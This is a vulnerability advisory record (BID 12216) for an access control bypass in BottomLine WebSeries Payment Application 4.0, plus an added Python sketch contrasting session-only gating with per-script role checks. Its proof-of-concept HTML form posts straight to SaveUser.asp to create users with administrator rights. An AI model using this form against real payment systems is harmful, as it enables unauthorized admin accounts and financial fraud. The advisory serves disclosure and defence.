BottomLine Webseries Payment Application Access Control Bypass Vulnerability
BID:12216
Info
| Bugtraq ID: | 12216 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 10 2005 12:00AM |
| Updated: | Jan 10 2005 12:00AM |
| Credit: | Discovery of this vulnerability is credited to "Paul J Docherty" <[email protected]>. |
| Vulnerable: | BottomLine WebSeries Payment Application 4.0 |
| Not Vulnerable: | |
Discussion
BottomLine Webseries Payment Application is reported prone to an access control bypass vulnerability. It is reported that any authenticated user may access all of the privileged and restricted scripts by requesting the scripts directly using a URI.
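As an added defender's illustration (not part of this BID record or of the vendor's code), the following Python sketch contrasts the weak pattern described above, where the only server-side gate is that a session exists, with a dispatcher that checks a per-script access-control list on every request, regardless of how the request was reached. The script path and form field names follow the SaveUser.asp form quoted in the Exploit / POC section; the session layout, the role names, the second script path, the sample users and the audit format are assumptions made for the example.

```python
# Added example, not code from the BID record or from the vendor.
# Shows why "is there a session?" is not an authorization check, and
# what a per-script, deny-by-default check looks like.
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Session:
    """Assumed session shape: the logged-in user and the roles they hold."""
    user_id: str
    roles: frozenset


# Access-control list keyed by script path. Anything not listed is denied,
# so a newly deployed privileged page is unreachable until a role is granted.
SCRIPT_ACL: Dict[str, frozenset] = {
    "/wsapp/SaveUser.asp": frozenset({"Admin"}),                 # from the PoC form
    "/wsapp/ViewPayments.asp": frozenset({"Admin", "AppUser"}),  # assumed script name
}
PUBLIC_SCRIPTS = frozenset({"/wsapp/Login.asp"})                 # assumed script name


def handle(path: str, form: Dict[str, str]) -> Tuple[int, str]:
    """Stand-in for the script bodies; the interesting logic is in the gates."""
    if path == "/wsapp/SaveUser.asp" and form.get("Action") == "ADD":
        return 200, f"created user {form['UserID']} admin={form.get('Admin') == '1'}"
    return 200, "ok"


def vulnerable_dispatch(session: Optional[Session], path: str,
                        form: Dict[str, str]) -> Tuple[int, str]:
    """Weak pattern: privileged scripts are 'protected' only by not being
    linked from the non-admin menu. A direct request to the URI goes straight
    through once any session exists."""
    if session is None and path not in PUBLIC_SCRIPTS:
        return 302, "redirect to login"
    return handle(path, form)


def hardened_dispatch(session: Optional[Session], path: str,
                      form: Dict[str, str], audit: List[str]) -> Tuple[int, str]:
    """Per-request check: authenticate, then require a role listed for this
    exact script. Denials are recorded so they can be alerted on."""
    if path in PUBLIC_SCRIPTS:
        return handle(path, form)
    if session is None:
        return 302, "redirect to login"
    required = SCRIPT_ACL.get(path)
    if required is None or not (session.roles & required):
        audit.append(f"DENY user={session.user_id} path={path} "
                     f"action={form.get('Action', '')}")
        return 403, "forbidden"
    return handle(path, form)


# Constructed request body mirroring the PoC form's field names.
ADD_ADMIN_FORM = {
    "Action": "ADD", "UserID": "newadmin", "UserName": "New Admin",
    "Password1": "example", "Password2": "example", "EMail": "newadmin@example.invalid",
    "Admin": "1", "SelUserGroup": "111", "SecurityGroup": "RegMgr",
}


def demo() -> Dict[str, object]:
    """Run the same direct POST through both dispatchers for assumed users."""
    clerk = Session("clerk01", frozenset({"AppUser"}))
    admin = Session("admin01", frozenset({"Admin"}))
    audit: List[str] = []
    return {
        "vulnerable_clerk": vulnerable_dispatch(clerk, "/wsapp/SaveUser.asp", ADD_ADMIN_FORM)[0],
        "hardened_clerk": hardened_dispatch(clerk, "/wsapp/SaveUser.asp", ADD_ADMIN_FORM, audit)[0],
        "hardened_admin": hardened_dispatch(admin, "/wsapp/SaveUser.asp", ADD_ADMIN_FORM, audit)[0],
        "hardened_unlisted": hardened_dispatch(admin, "/wsapp/NewReport.asp", {}, audit)[0],
        "hardened_anonymous": hardened_dispatch(None, "/wsapp/SaveUser.asp", ADD_ADMIN_FORM, audit)[0],
        "audit": audit,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The point of the contrast is that the check has to run inside the request path of every privileged script, keyed on the script actually requested, not on which links the user was shown. Deny-by-default means an unlisted script (here the assumed NewReport.asp) is refused even for an administrator until it is deliberately added to the list, and the audit line gives operations a concrete event to alert on when a non-administrative account posts to an administrative script.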
Exploit / POC
No exploit is required; the following example is available:
<html>
<body>
<h1>Add User</h1>
<hr>
<form action="http://www.example.com/wsapp/SaveUser.asp" method="post">
Action <input name="Action" value="ADD" type="text"><br>
UserID <input type="text" name="UserID"><br>
UserName <input type="text" name="UserName"><br>
Password 1 <input type="text" name="Password1"><br>
Password 2 <input type="text" name="Password2"><br>
Email <input type="text" name="EMail"><br>
Administrator <input type="checkbox" name="Admin" value="1"><br>
Application User <input type="checkbox" name="AppUser" value="1"><br>
User Group <input type="text" name="SelUserGroup" value="111"><br>
Security Group <input type="text" name="SecurityGroup" value="RegMgr"><br>
<input type="submit" value="submit">
</form>
</body>
</html>
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
References:
- WebSeries Homepage (Bottomline Technologies)
- Portcullis Advisory 05-001 Update, Webseries Payment Application ("Paul J Docherty")
- Portcullis Security Advisory 05-001 ("Paul J Docherty")